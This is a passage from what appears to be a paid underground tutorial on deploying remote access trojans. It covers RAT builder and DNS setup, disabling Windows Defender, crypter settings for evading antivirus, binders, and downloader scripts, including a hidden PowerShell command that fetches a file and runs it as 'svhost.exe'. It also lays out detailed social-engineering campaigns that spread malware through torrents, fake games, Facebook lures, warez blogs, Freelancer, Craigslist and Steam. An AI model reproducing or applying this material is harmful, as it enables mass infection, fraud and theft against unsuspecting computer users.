+- Take one of the free ones and click on 'get it now!' +- At the right select the period you want to get it for. (You can choose upto +1 year for free!) +- As with any website you will be asked to register an email and all the +other stuff. You can use random information but make sure you have +access to the email! + +- Now that you have your domain head over to this +link.https://my.freenom.com/clientarea.php?a(You can navigate there by +clicking on domains --> my domains) +- There you will want to click on manage domain followed by manage +freenom DNS. +- Here you will be greeted by the following. +- You can leave everything here as the default setting. The only thing you +need to change is the target. +- The target will be the IP shown at canyouseeme.org +- Fill in that IP as the target and hit save changes. Your DNS will now be +active after 10 - 20 minutes! +- You've succefully created a DNS! After waiting 20 minutes you can go +onto testing.Read the testing your DNS section to check if your DNS was +created properly! +Testing your DNS: +You've created your DNS! Congrats man. Now let's see if it's actually +working properly. +- Open your command prompt and type in the following command. +- ping 'yourdnshere' without the '' +- If you see the following but with your IP there then your DNS is working +properly! + +Setting up a RAT +Read the 'testing your port' and 'testing your dns' section before going onto +this! +So you've port forwarded and set up a DNS and are ready to embark on the +RAT adventure? +I will use REMCOS RAT as an example how to build your binary +correctly. All other rats has similar setup. +Connection tab: Fill in your DNS/IP, port and hit add. +Installation tab: +Enable whatever you want, i will explain some common rat settings +later. +How to test your stub properly +What do you mean? Test it properly? +Well, using the wrong IP inside of your builder usually leads to no +connection. As most of you might think there's multiple IP's to use in +multiple situations. You can find them down below. + +BUILD YOUR STUB ACCORDING THE 'SETTING UP YOUR RAT' +SECTION! +Alot of you are testing your stubs the wrong way, making you think things +are broken while that might actually not be the case. Here's how you test +your stub properly. (All of this assumes you are running your RAT on your +actual pc and not somewhere else) +Where am I testing my stub? +1) On the same computer you're running your RAT on. +2) On a VM on the same computer that you're running your RAT. +3) A different computer in the same network. +4) An outside computer outside of your network. +What IP do I need for that? +1) SAME COMPUTER = localhost or 127.0.0.1 +2) VM SAME COMPUTER = Your IPv4 or when using a VPN your +public IP (found at canyouseeme.org) +3) Different computer same network = Your IPv4 or when using a VPN +your public IP (found at canyouseeme.org) +4) Computer outside of your network = Your public IP found at +canyouseeme.org or your DNS. +Couple of examples. +1) Testing on my own computer +-->https://gyazo.com/26352d88a01457884aa949c5a32949e6 +2) Testing on my own VM (no VPN) +-->https://gyazo.com/6b9590b953c96285083efb9894c1aea2 +3) Testing outside of network +-->htps://gyazo.com/2f3586ac057ed84882e55c3e2681d07c +HELP NO CONNECTION!! +Calm down, don't panic. This guide WILL have the fix you're looking for +but start by checking the following: +- Is my stub crypted? Always test connections uncrypted! This way you'll +know if it was your crypter that broke the stub or not. +- Did my AV remove it? It might not look like it, but this is the case 95% +of the time. Go check if the process is actually running. +- Am I being a dumbo? Did you misread a portion of my guide? It's very +possible, go read over it again. + +Common RAT settings explained (open for suggestions) +- Installation/Startup: Required for your client to come back after he +restarts his computer. +- Persistance/Respawn/Critical Process/: Will protect your process from +being killed in the task manager. +- Mutex: It's a key preventing other RATs with the same key to run on that +system. (To make sure you never run your RAT twice on accident) +- Anti Virtual Machine/VM: Prevent your RAT from being run on a virtual +machine. +- Silent/Hidden mode: Required to prevent your client from noticing that +your RAT is running. +- Melt: Your file will be removed when executed. (The original, not your +startup process) +- Request elevation: Will request administrator permissions from your +client. +- BSoD: Will generate a blue screen of death upon trying to kill your +process. +Common questions (F.A.Q) +Q: What's the best RAT? +A: There is no best RAT. Every RAT has it's own strong and weak points. +Q: What's the best crypter? +A: Currently I believe Cyberseal is the best crypter around. +Q: Do you need a VPN? +A: No, you do not. Just like you don't need a seatbelt when driving but we +all know what happens if something goes wrong and you aren't wearing +one. +Q: Do you need a DNS? +A: No you don't but you'll permanently lose all your clients if your IP +changes. +Q: Personal recommendations? +A: Netwire, Imminent Monitor + +Q: Where can I download Darkcomet? +A: NOWHERE! Darkcomet doesn't exit. Think of it that way. +Q: Should I buy a crypter? +A: Yes, don't even BOTHER with free crypters. Just no. +Don't do ANY of this. +Spoiler +RAT Related +- Do not use Darkcomet for the reason that it has serious security flaws. (I +will deny you help if you insist on using this RAT) +- Do not use Blackshades for the reason the police took over the product. +- Do not use NO-IP for the reason that it is monitored by Microsoft. +- Do not use duckDNS for the reason that they'll give you honeypots. +- Never use the same port for 2 RATs. (or program in general) +- Participate in banking fraud. +Crypter Related +- Use startup in both crypter and RAT. +- Use any settings in both crypter and RAT. +- Never crypt a crypted file. +- Inject into a process when using startup on a .NET RAT. (Ex. +Luminosity) +- Do not cry to crypter owners about a 10/35 detection rate, it's your own +fault. +- Assume scantime and runtime is the same. +- Do not use the website +http://www.virustotal.com + +Windows Firewall and Defender +Sometimes when ratting or using botnets, windows firewall and +defender may be a problem so i will show you how to disable it +completly. +Firewall: +In your windows go to control panel, system and security, windows +firewall. Click on turn on/off windows firewall: +Now go to advenced settings and turn it off completly: + +For windows defender go to control panel, windows defender, tools +and settings, options, administrator and untick this option: Use this +program. +This was for windows 7. In next step i will show you how to disable +windows defender for windows 10. + +If you're using Windows 10 Pro or any other enterprise variant, such as +Windows 10 Enterprise or Windows 10 Education, you can use the Local +Group Policy Editor to disable Windows Defender from your computer +permanently. +1.Use the Windows key + R keyboard shortcut to open the Run +command. +2.Type gpedit.msc and click OK to open the Local Group Policy Editor. +3.Browse the following path: +Computer Configuration > Administrative Templates > Windows +Components > Windows Defender +4.On the right, double-click Turn off Windows Defender. +Select Enabled to disable Windows Defender. +1.Click Apply. +2.Click OK. + +Once you complete the above steps, you will notice the Windows Defender +shield icon will continue to run in the system tray. To get rid of the icon, simply +restart your computer. +At any time, if you want to re-enable Windows Defender, you only need to follow +the same steps, but this time, on step 5 select the option Not configured. Then +restart your computer to complete reverting the changes. +How to disable Windows Defender using the Registry +If you're running Windows 10 Home, you won't have access to the Local Group +Policy Editor, as it's only available for enterprise versions of the operating +system. However, you can modify the registry to accomplish the same result. +Important: Before diving into this guide, it's worth noting that editing the +registry can be dangerous, and it can cause irreversible damage to your +system if you don't do it correctly. It's highly recommended to make a full +backup of your system before proceeding. You've been warned! + +1.Use the Windows key + R keyboard shortcut to open the Run +command, type regedit, and click OK to open the registry. +2.Browse the following path: +HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Window +s Defender +3.If you don't see DWORD DisableAntiSpyware, right-click on an +empty space, select New, and click on DWORD (32-bit) Value. +4.Name the key DisableAntiSpyware. +5.Double-click the newly created key, and set the value from 0 to 1. +Restart your computer to complete the task. +At any time, if you want to re-enable Windows Defender, you only need to +follow the same steps, but this time, change the value on step 5 from 1 to +0. Then restart your computer to complete reverting the changes. + +How to disable Windows Defender using the Settings app +In the case, you're only looking to disable Windows Defender temporarily; +you can do the following. +1.Open Settings. +2.Click on Update & security. +3.Click on Windows Defender. +4.Turn off the toggle switch for Real-time protection. +While Windows Defender doesn't specify how long you can disable real- +time protection, "temporary" usually means until the next time you reboot +your computer. +It's really important to note that we're NOT saying that you shouldn't use +an antivirus on your computer, but there are always situations when you +may need to disable Windows Defender from your machine permanently. + +Setting up Virtual Machine: +Running Virtual Machine is very important when dealing with +malware and viruses. If you are doing everything on Virtual Machine, +not directly on your PC you minimalize the chance to get infected. +You can run all malicious and untested/untrusted files inside your +Virtual Machine and your main PC will not get compromised. +To run virtual machine you may use Vmware workstation(paid but +easly to find cracked version) or VirtualBox(free). +I will show you how to setup virtual machine using VirtualBox +Download virtualbox from official website: +https://www.virtualbox.org/ +Obviously to setup windows on it you need to have windows ios file +you may download it from MSDN or some 3rd party sites. +To create a new virtual machine, you need to start VirtualBox. On the host +where you installed Oracle VDI and VirtualBox, select the Applications +menu on the desktop, then the System Tools menu, and then Oracle VM +VirtualBox. Alternatively, you can run the VirtualBox command in a +terminal. The Oracle VM VirtualBox Manager is displayed, as shown in +Figure 6.4. Oracle VM VirtualBox Manager + +Tip +All the following steps for creating a virtual machine can be performed +using the VirtualBox command line. However, if you are new to +VirtualBox, you will probably find the Oracle VM VirtualBox Manager +easier to use. +In the toolbar, click the New button. The New Virtual Machine Wizard is +displayed in a new window, as shown in Figure 6.5. +Figure 6.5. New Virtual Machine Wizard +Click the Next button to move though the various steps of the wizard. The +wizard enables you to configure the basic details of the virtual machine. +On the VM Name and OS Type step, enter a descriptive name for the +virtual machine in the Name field and select the operating system and +version that you are going to install from the drop-down lists, as shown in +Figure 6.6. It is important to select the correct operating system and +version as this determines the default settings for VirtualBox uses for the +virtual machine. You can change the settings later after you have created +the virtual machine. + +Figure 6.6. VM Name and OS Type Step +On the Memory step, you can simply accept the default. This is the amount +of host memory (RAM) that VirtualBox assigns to the virtual machine +when it runs. You can change the settings of the virtual machine later, +when you import the template into Oracle VDI. +On the Virtual Hard Disk step, ensure Start-up Disk is selected (see Figure +6.7) , select Create new hard disk and click Next. The Virtual Disk +Creation Wizard is displayed in a new window so you can create the new +virtual disk. + +Figure 6.7. Virtual Hard Disk Step +On the following steps, select VDI (VirtualBox Disk Image) as the file +type, Dynamically allocated as the storage details, and accept the defaults +for the virtual disk file location and size, and then click Create to create the +virtual disk. +When the virtual disk is created, the Virtual Disk Creation Wizard is closed +and you are returned to the Summary step of the New Virtual Machine +Wizard. Click Create to create the virtual machine. The wizard is closed +and the newly-created virtual machine is listed in Oracle VM VirtualBox +Manager, as shown in Figure 6.8. + +Figure 6.8. Virtual Machine Added +Since you want to install an operating system in the virtual machine, you +need to make sure the virtual machine can access the installation media. To +do this, you edit the virtual machine settings. In Oracle VM VirtualBox +Manager, select the virtual machine and then in the toolbar click the +Settings button. The Settings window is displayed. In the navigation on the +left, select Storage as shown in Figure 6.9. + +Figure 6.9. Virtual Machine Storage Settings +In the Storage Tree section, select Empty below the IDE Controller. The +CD/DVD Drive attributes are displayed. Click the CD/DVD icon next to +the CD/DVD Drive drop-down list and select the location of the +installation media, as follows: +• To connect the virtual CD/DVD drive to the host's physical CD/DVD +drive, select Host Drive . +To insert an ISO image in the virtual CD/DVD drive, select Choose a +virtual CD/DVD disk file and browse for the ISO image. +Figure 6.10 shows an ISO image inserted in the virtual CD/DVD drive. + +Figure 6.10. Virtual Machine CD/DVD Drive Settings +Click OK to apply the storage settings. The Settings window is closed. If +you connected the virtual machine's CD/DVD drive to the host's physical +CD/DVD drive, insert the installation media in the host's CD/DVD drive +now. You are now ready to start the virtual machine and install the +operating system. +In Oracle VM VirtualBox Manager, select the virtual machine and click +the Start button in the toolbar. A new window is displayed, which shows +the virtual machine booting up. Depending on the operating system and the +configuration of the virtual machine, VirtualBox might display some +warnings first. It is safe to ignore these warnings. The virtual machine +should boot from the installation media, as shown in Figure 6.11. + +Figure 6.11. An Installation Program in a Running Virtual Machine +You can now perform all your normal steps for installing the operating +system. Be sure to make a note of the user name and password of the +administrator user account you create in the virtual machine, which you +will need in order to log in to the virtual machine. Do not join the virtual +machine to a Windows domain (it can be a member of a workgroup) as the +domain configuration is performed later. The virtual machine might reboot +several times during the installation. When the installation is complete, +you might also want to let Windows Update to install any updates. + +Crypters: +Crypters are legal encrypting tools. If used correctly, and with proper +permission, then you have nothing to worry about. On the other hand, if +you are using crypters to encrypt malware with the sole purpose of +infecting computers that are not yours you are committing acrime. +Everything you need to know. I explain features, options, settings, basic +knowledge, detections, how to not ruin your stub and ultimately how not to +annoy the crypter owner. +Terms & Definitions +•RunPE +•RunPE is the piece of code made to Inject the Payload into the +memory of the chosen process. +•Injection +•The process of placing the Payload into the memory space of a +chosen process. +•Most commonly injected processes are: +•svchost.exe +•RegAsm.exe +•explorer.exe +•Default Browser (ie chrome.exe, firefox.exe, +iexplorer.exe) +•Itself (Meaning the payload is injected into the running +process, ie your crypted file) +•vbc.exe +•cvtres.exe +•PayLoad +•In noob terms the file you chose to encrypt. +•Encryption +•The algorithm to "protect" and transform the bytes of a chosen +file, making them unrecognisable and totally different from +original bytes. +•Stub +•The program created to store your encrypted payload and to +inject it in memory when ran. +•This is where the Scantime Detections will come from. + +•Private Stub +•Same as above, except you should be the only person using the +stub. +•Code is essentially different from public stubs, making it +harder to detect Scantime. +•Longer FUD time. +How does it work? +•The image bellow illustrates very simply what a crypter does to your +file. + +Scantime vs Runtime +•Scantime Definition +•A file is scantime detected if before it's ran the AV detects it, or +when a scan is ran the file is found and marked as a threat. +•Scantime Detections are caused by visible instructions or PE +info such as Assembly/Icon, Cloned Certificates, Resources +Type and Size, Instructions and more that may be considered +malicious. +•That means that Essentially what file you crypt will make little +to no difference on scantime detections as the file is encrypted +in an unrecognizable way. +•Safe places to test your Scantime Results: +•XC Scanner +• Nodistribute +•VirusCheckMate +•Runtime Definition +•A file is Runtime Detected if, only after the file is ran, it +triggers the AV program to block, stop or delete the program in +question. +•Runtime Detections are caused by behaviour. Basically how +your file acts and runs can prompt a runtime detection. +•The file you crypt WILL affect the Runtime Detection. +•To avoid Runtime Detections you should refrain from using +overused settings. Also avoid using any piece of software that +could be used for malicious purposes. +•A way to prevent some Runtime Detections is also to use Anti +Memory Scan, which will basically deny access to the memory +space your server is running on. + +Detections +•Scantime +•User Caused +•Generic Detections - Often caused by Size, Icon, +Assembly Info selected by user. +•Example of common Generic Detections: +•Kazy (this could also be coders fault in some +occasions) +•Bary +•Zusy +•Gen:* +•These detections are easily removed by: +•Changing Icon - avoid low resolution/size +icons. +•Changing Assembly Info - avoid overused +Assemblies, but find something trusted +enough. +•Pump the file slightly. +•If all else fails, try removing Version Info +resource. (Using ResHacker. Some crypters +offer this option) +•Crypter/Coder Caused +•Heuristic Detections and some Generic Detections. +•Instruction or set of instructions that trigger detections. +Nothing the user can do. +•PE Structure. +•Example of Coder Caused Detections: +•Injector.* (i.e. Common NOD32 detection) +•Heur:* +•MSIL:* +•Runtime +•User Caused +•Selecting every single possible setting on Remote Access +Tools WILL most likely cause runtime detections. You +will also successfully annoy support and the owner. +•Selecting very common injection Processes. +•Here's how you can solve some of them: + +•Avoid injecting into overused processes such as +svchost.exe, may cause detections. +•Add Delay (30+ secs) will bypass some AVs +Runtime. +•Decent Icon and Assembly Info. +•Crypter/Coder Caused +•Overused RunPE with no modifications. +•Copy & Pasta of code. +•Long time without checking for Runtime Detections. +How Not to Corrupt your Server +•Things to Avoid: +•Double Crypting - Why on earth would you do this? +•Ticking every single option on both crypter and your file. +•Important Things to Keep in Mind +•Is your file Native or .Net/Managed? +•Is your file .NET? +•It's RECOMMENDED to inject into 'Itself', choosing +something else may corrupt your file's settings. +•Is your file Native? +•It's RECOMMENDED NOT TO inject into 'Itself', +choose something else. +•If you're injecting into anything other than 'Itself', it's recommended +to no select any options on the file as it might corrupt some, +especially startup - unless your crypter has PEB patching of course, +and most don't. +Why is My File Not FUD Anymore? +•Very important factors in how fast it gets detected: +•If the customer base are using the crypter illegally. +•Where the file is uploaded to. +•How big the customer base is for the crypter in use. +•Which file was crypted and what it was used for. +•Many coders can easily use the same "method" to achieve a result. If +it gets detected for one of them, it will most likely get detected for +the other. +•AVs Update very regularly, usually more than once a day! + +•That's just how crypters work, they get detected. And when they do, +it's not the end of the world - reFUDing most times takes less than 1 +hour! +How Not to Ruin your FUD Time +•Things to Avoid: +•Scanning on Sites that distribute your files to Anti Virus +companies. Forbidden sites are: +•VirusTotal +•Anubis +•Jotti +•If you wish to add another PM me. +•Uploading your file on Sites that will distribute files, +regardless of what kind of file it is. You are entitled to your +privacy, as long as you keep the law. +Forbidden sites are: +•Dropbox +•MediaFire +•GoogleDrive +•If you wish to add another PM me. +•Things to Do: +•Every AV will share samples from your PC, make sure to +disable any such service on your AV's Settings. +How Not to Annoy the Crypter Owner +•Things to Avoid: +•SPAMMING. +•Posting Infected Results on the Sales Thread, ESPECIALLY +when detections are YOUR fault. (Refer to Detections section +on this post) +•Posting any problems on the thread, when you've not tried to +contact support. ALWAYS CONTACT SUPPORT FIRST. +•Things to Do: +•If you PM for support because a file is not working, always +PM ALL THE SETTINGS you are using. +•Be patient. +•Keep the rules. + +•Don't be stupid +•Read all the tutorials/watch videos of settings BEFORE +contacting support for problems. +Crypter Features & Description +•Startup/Installation +•Module of the stub that adds your file to the list of programs to +run with Windows at start! +•Many different types. Using Registry, Tasks, Copying file to +Startup Folder, etc. +•Startup Persistence +•Module that will constantly checks if the your file has been +removed from the startup list. +•Process/Injection Persistence +•Module that will constantly checks if your server has been +killed, if it has start it or inject the payload again. +•Again many different ways of achieving this i.e. Watchdog, +DLL Injection and the list continues. +•Anti Memory Scan +•Module that will deny access to anything that tries to read the +payload you injected. +•Extremely helpful against Runtime Detections. +•Elevate Process/Privileges +•Attempts to gain Admin Rights for your file. +•Critical Process +•Changes certain attributes of your running file that will cause a +BSOD (Blue Screen of Death) if the process is terminated. +•Mutex +•A very useful feature to make sure your file is not running +more than once at the same time. +•Melt File +•Removes/Deletes your file after it is successfully ran. +•Extension Spoofer +•Simple trick with a Unicode Characted called LeftToRight. +Doesn't change the actual extension but will make it look like +something else. + +•File Pumper +•Add a set number of bytes (with value 0) to the end of your +file, increasing it's size but without disrupting the any +procedures on runtime. +•Compress +•Decreases the output size. +•Icon or Assembly Cloner +•Copies the Assembly Information or the Icon of a chosen file. +(Good to bypass some Generic detections) +•Encryption Algorithm +•Function used to transform the bytes of your file into +something completely different. +•Will essentially make little to no difference on detection which +algorithm you use. +•Delay Execution +•Used to "stop" or pause your file, while running, for a certain +period of time. +•Adding 30+ seconds will in some cases help bypass runtime +detections, believe it or not. +•Binder +•Add another file to the output, now your output will run the +main file but also the file you binded one after the other! +•Downloader +•Well that's obvious, downloads and runs a file from a given +URL. +•USG - Unique Stub Generator +•Will make sure your stub is as different as possible from +previous crypts. +•Cheap versions on USG will only rename variables and +methods - making not much difference at all. +•Fake Message Box +•A Message Box will Pop Up when the file is executed. You can +choose for it to display whatever message. +•Hide File +•Sets the option of your file to be Hidden so that any +unauthorized user can't remove your file. + +•Users can still see the files if the "Show Hidden File and +Folders" option on their computer is on. +•Antis +•Stop your file from running if certain programs are running in +the background. +•Most common Antis are: +•Anti Virtual Machine (VMWare, VirtualBox and +VirtualPC) +•Anti Sandboxie +•Anti Wireshark +•Anti Fiddler +•Anti Debugger +•Anti Anubis +•Botkill +•Searches for any existing files or processes that might be +malware and attempts to kill/remove them from the system. +•Remove/Change ZoneID +•ZoneID information recorded on the file, to let Windows know +where it came from. (In most cases causing the Smart Screen, +or the "Are you sure you want to run this file?" box) +•This module will remove the ZoneID the file was given. +•The different values are: +•0 - Local Machine +•1 – Intranet +•2 - Trusted +•3 - Internet +•4 - Untrusted +•Spreaders +•Attempts to copy your file to places where it might be visible. +•Most spreaders don't work, so don't be fooled. +•There is no legal need for these so don't use them. +•Junk Code +•Adds useless, unnecessary lines of code/instructions in an +attempt to bypass some less specific Scantime Detections. +•Somewhat efficient but also increases the stub size. + +•Remove Version Info +•Deletes a resource called Version Info, which contains all the +assembly information. +•Helps get rid of Kazy generic detection when all you have +tried has failed. +•Require Admin +•Prompts an UAC window asking the user to run the file as +Admin. +•Certifcate Clone/Forger +•Adds a Certificate to your file copied from other signed +Applications, the certificate will be invalid but makes your file +look a bit more legit. + +Binders: +Binder is a program used to scale 2 exacutable files into one. +I will show you few methods how to bind your virus into legitimate +program. +– You may use Ultimate Spreading Tool – Usually you can use +binder in your crypter but you have to make sure that you have +option „run once”. +– I suggest you to use Exe to bat converter if you are binding two +executable files. Open notepad and type: +@echo off +start server.exe +TIMEOUT /T 10 +start legit.exe +– Save it as start.bat and add it in converter. In options choose +invisible application and/or current/temporary directory. Include +server.exe – your server and legit.exe – your program. +– Now compile it and tests if it open your virus and legitimate +program. +Important: always crypt your file BEFORE you bind it to another +application. + +Downloaders: +Downloader is a program which is used to download and execute another +executable file. +When you spread your file it often get detected because people scan it on +virustotal. If u spread downloader, not directly your virus, they will scan +your downloader, not your virus so your file may stay fully undetectable +for much longer. +Of course you still need to crypt your downloader before you crypt it. +To get long FUD results you need to use 2 different crypters. +First one will be used to crypt a downloader, and second one will be used +to crypt your botnet/rat file. +– Use scantime FUD downloader instead of your encrypted server. +People will always download your fresh file. +– – You can use Ultimate Spreading Tool or Neos Downloader or any +other free downloader. – You can make your downloader using +AutoIT. +– Download AutoIT +Create new AutoIT Script: +$downloadlink = "[DirectLinkToYourFile]" $downloadhere = +@Appdatadir & "\YourFile.exe" Inetget($downloadlink, +$downloadhere, 1,1) +Sleep(500) shellexecute($downloadhere) examples: $downloadlink = +"[http://directlink.se/server.exe]" $downloadhere = @Appdatadir & +"\server.exe" +Now you can run and convert it to .exe + +– – You can create .ink downloader. Right click in +destkop/create/shortcut and copy this code: +powershell -windowstyle hidden (new-object +System.Net.WebClient).DownloadFile('http://the.earth.li/~sgtat +ham/putty/latest/x86/putty.exe','%TEMP%\svhost.exe'); StartProcess +"%TEMP%\svhost.exe" +Replace link to putty.exe with your file. Warning: You cant bind .ink +with other files. +– Investment – You can always buy FUD downloader to get the best +results while spreading. + +Spreading: +1.Geo-targeted Torrents Spreading: +This method is known everywhere, but i guess you never heard about how +to target specific countries. Go to http://torrentinvite.org/ and click +register(1*). +You should use chrome browser and autotranslate. This site is only +message board about p2p newtorks. Go to Open registration thread(2*). +You can find here public and private trackers from the entire world. You +will get the best results if you choose site in your arterial language but you +can still use chrome auto-translate. +You can find much more than this: http://1337x.to http://limetorrents.cc +http://www.brshares.com/ http://rofront.ro/signup.php +https://tmghub.org/index.php?page=account https://avistaz.to/auth/register +https://eutorrents.to/auth/register + +Important: +– 5-15 USD Buy Seedbox/Shell/RDP, you will be able to seed your +torrents 24/7. Windows RDP with 100-500gb will be enough for you. – 5- +15 USD I suggest you to buy invite to private tracker. You will have access +to legitimate software. Im usually using http://iptorrents.com. You can +always find your software somewhere else. +Now you have to find popular windows application and bind it with your +server. I will show you few methods how to do this. First you have to use +crypter to make it FUD. You will get the best results if you buy private +stub and if its runtime fud. +Compile your file and make new torrent in your RDP. Usually you +have to add trackers(3*) to it but its not necessary. You may just +google public trackers list 2016. First you should upload few legit +torrents movies/music or other. Dont upload duplicates and read rules. +If you will be banned just make new account. + +2. Spreading to gamers: +This method do not require investment and you will need only 15 +minutes to setup everything. You just need to register in one of +those sites and pretend to be a young game developer: +http://itch.io/ http://www.indiedb.com/ http://gamejolt.com/ +Make account and make your profile looks more legit, add +picture,description,something about you. Choose a development +status when you adding new game. Remember, the better it +looks, the more downloads you will get. Pump yoour file to +about 20-50 MB or add to archive some random DLL files, your +server/downloader and upload it. You shuould use „fake error” +option in your crypter. Then you can advertise your game in chat +or other places. Dont upload duplicates and read rules. If you +will be banned just make new account. You should find other +inchie games sites and repeat process. With this method you can +easly get hundred clients per day. +3. Facebook spreading. +STEP 1 make your file FUD and change the icon to a fidget +spinner or make it look like a form, next upload it to directlink.cz +and or safe.moe or anywhere you may choose. STEP 2 The +spreading, I mainly use Facebook for this but you can use other +socialmedia sites and or forums, but I have had the most success +using facebook you need to make a fake account that promotes +fidget spinners and upload and share the photo I provided with a +description like this: “To win a free fidget spinner just click the +link down bellow download our form and you will soon receive a +free sample fidget spinner” you can make this a bit more +elaborate to make it more convincing or if you already have +access to FB accounts that you have achieved from slaves you +already have just log in and post this same message and tag all +the users friends and family members, but most people will fall +for it regardless and I know what you may be thinking this + +method is ridiculous I was just as suprized as you were once I +tried it I had several hundred downloads after I uploaded it to +several facebook accounts item popularity is key people see +something booming on the net so they wan’t it, this method is +most effective on facebook accounts that already have allot of +real friends or family members, but the fake account method +works aswell you just need to share the photo and the link with +the description I provided on as many toy FB pages or popular +pages as possible and the results will begin to show. anyway this +method is coming to an end now, I hope you gain as much +success as I did with it and I hope you enjoy it, you can put your +own twist on it aswell and maybe incorporate different items, +such as other fidget toys or niches but regardless thanks for +buying and good luck! +Example FB Post: + +4. Warez spreading +This is really old but still working method. So why did you pay +this tutorial? Because I’ll not just tell you some ideas. I’ll show +you how to do it with actual tools. I’m using this method for my +silent miners and so far 15-20 new downloads every day with +autopilot. I’ve spend only $11 dollar for this setup and every day +15-20 new install is good numbers for me. Lets begin the +tutorial. First of all we will basically open a warez download +blog. At least people will think that way. You need to buy your +hosting and domain anonymously because of you will share +some illegal things on this site and we don’t want to leave any +trace behind us. +For anonymous purchase and good service I choosed Namecheap for +this method. I paid $11 for SSL + Hosting + Whois Protection + .store +domain This will be total amount of our investment. Don’t forget to +pay with bitcoin. We are choosing Namecheap because they let us +paying with bitcoins. And complete the forms with fake information +ofcourse. After we setup our site we won’t even login again so do +everything carefully :) Ok we bought our hosting and domain and we +are ready to go. Login your cpanel and setup your wordpress +automatically. Find a good, seo friendly and lightweight theme for +your wp and install it. Go to Plugins and click the add new. Search for +wp-o-matic This tool is a lifesaver. Install and activate it. Wp-o-matic +is a content robot. It’s fetching contents from the rss feeds +periodically. Yes this content is not original, yes it is bad for seo but +we are not aiming high ranks on the google either. C/P content will do +don’t worry. Go to Wp-o-matic and click add new campaign. + +This section is customizable but you should follow and copy my +settings. Add New Campaign You can give a name for your campaign +like KeyGens. We can collect all keygen rss’s under this campaign. +Widget After Content I’ll get this later. No need to touch it. Campaign +Description You can leave blank this section. Feeds For This +Campaign This is an important part. You should go to google and find +some quality warez blogs. I checked google and find one and it has rss +feeds too :) https://insiderex.com/feed/ Click the add feed button and +paste your feed url. Then click the Check all feeds button. If this feed +is suitable it turns green. If it is not suitable it will shown red. Delete +the red ones and add the new rss’es. 4 5 quality rss feed will do. It +means at least 4 5 new post to your site. +Publish You don’t need to change anything in here. And we are not +ready to publish either. Wait for other settings. Campaign Post +Formats This section is irrelevant too. No need to change anything +here. + +Options for this campaign If you are not know what are you doing just +copy my settings in here. We are getting contents and removing +original download links from it here. We will add our download links +later. Schedule Cron You will schedule your campaign so everyday at +3 o’clock your bot will add new contents. Campaign Categories You +can check add auto categories and you don’t need to do it manually +later. Don’t change anything more at your page. + +Click publish and wait. When the Run Now button available click it. +And wait your bot is fetching new contents. Now you have a warez +blog which is creating automatic content everyday. Congratz. You can +add your advertisement codes and start earning little from it. But stop +we are not after advertisement earnings. Lets move on. Now go to +plugin page again and click add new. Search for Widget After Content. +Install it then activate it. This plugin creates custom contents +automatically after every one of your posts. We will add our download +links with this plugin +Did you see, there is a after content block. Drop down there a text +widget and open it + +Add your download links and click save. You will put your own stubs +download links don’t forget. And you can rename your mallware like +Ultimate Downloader, Sourceforge Downloader and you are ready to +go. You have an auto-pilot slave factory congratz. This is my one +week download numbers. Isn’t it bad huh? +5. Freelancer.com spreading +This is the website you’ll be using for the 1 st method ^ You’ll need to sign +up on the site first. Will take 30 seconds or so to sign up. Most of you may +know what freelancer.com is. If you don’t know what it is the website +basically allows you to post jobs on there/ also lets you work on diff jobs +for $. If you’re into making $ you could work on jobs but we’re looking to +spread so we’ll be posting a job offer. + +This is just one example of what you could use. You could make up +your own ideas/examples as well but for this demonstration what I’ll +be doing is making a gig offering a job for someone to write me a +“700 Word Review on my new app that I just made” +In the description you’ll be telling them that the only way to contact +you is to download app and ask through the app that they’d like to +make the review. Most people on the website will pretty much do +anything for even a small amount of cash so you should get a decent +amount of people. Once set up this is completely 100% Autopilot +As far as the budget making goes you can pick any type of budget for +the project that you’re willingto pay ( You won’t actually be paying) +as the job won’t even be starting. You should choose the lowest budge +if you decide to use my example. I know most people are able to think +outside the box and that many people have different ways of thinking +so I’m sure many of you could come up with great ideas. If you can’t +come up with any ideas just use my example + +6. Craiglist method: +Go to Craigslist.com Register An Account There. So here we will be +using People stupidity. So go to craigslist and post an ad on antiques +and furniture section is craigslist you will see like this. +Now put on you add this to your ad. +“I have this special furniture/antique for sale I can put the image up +because it’s an very big image for those who are interested Pm me I +will give you an image download link and you can see The image and +respond to me later Here is my email link – +putyouremailhere@yahoo.com” +Now after you have successfully done this. You will receive several +email from various people asking you to show the product picture. At +the time we have to already make an image with server binded to it +and it should be crypted. For image binding of server use Celesty +Binder and also spoof extension to jpg(search in google for these) +Now we have to put auto verification reply on our yahoo email. Open +your Yahoo email and do the following Go to settings (it look like this +for those who don’t know) + +Arrange it with your download virus link {BIN} and then add your +messages towards the craiglist customers as they send you emails and +it'll be auto verification response. This is one of the ways you can +spread +7. Forum spreading: +Forum spreading is used by a lot of people. It’s quite simple and can +be effective. But I don’t really spread on forums because I haven’t got +the best experience with it. However a few of my friends got a lot of +bots by doing this. Just register on the forum you want to spread on +and post a thread with a short description and a download of the file. +Bind the file for better results and make it look a bit serious. +Forum list: +http://www.nulled.cr/ +https://leakforums.net/ +http://mygully.com/ (German but lots of users) +http://www.boerse.sx/(German but lots of users) +The best forums are forums that speak your language. Because of that +just search forums that speak your language and create a serious +looking thread. If you’re lucky you maybe get a high ranked account +by the time. And if so, you can get a lot of bots with it because all +people think you’re trusted. + +8. Spreading on steam. +You will need to have a steam account that you have bought +something on. I recommend just buying the cheapest game you can +find on a new account, and email, as there is a slim possibility of +getting banned from steam for this method. You will be making a +steam concept. To create your steam Concept head over to +http://steamcommunity.com/greenlight/ Once there you will notice a +green button on the upper right hand corner of the Steam Greenlight +Banner. +Once you've clicked on the Submit your product button you'll be taken +to a page with two new buttons. One saying Pay now, and the other +saying Submit Concept. You'll be clicking the Submit Concept button. +Now here's the “fun” part. You will need to create a title, branding +image, description, choice of category, and agree to some terms. Then +you'll need a Video and a few preview images of your game. You can +skid this video from YouTube and find some images on Google; or +create your own. After that you are done. +But wait, lets be real. You don't want to do that. Enclosed in the .zip +file that contained this guide you will find a folder called Assets. +Inside this folder is a set of pre-made fake games for you to Copy & +Paste & upload as your steam concept! (: + +Once your done your steam concept should look something like this: +http://i.imgur.com/5RWfju6.png & http://i.imgur.com/bcUCwPX.png +A very useful part of the What Categories does your item belong in is +that you can literally pick what type of person you want to infect. Do +you want people that speak certain languages? Do you want people +interested in Action games? Do you want people on Macs? Not an +issue. Just select the categories that appeal to the kind of people you +want to infect. Of course, if your goal is just to infect mass people +select them all. (: +Our next step is to allow users to download and play your “demo” +which is really just your infected file. You can make your infected file +do whatever you want when it's opened. Such as a fake error, open an +image, do nothing, etc. It doesn't matter. 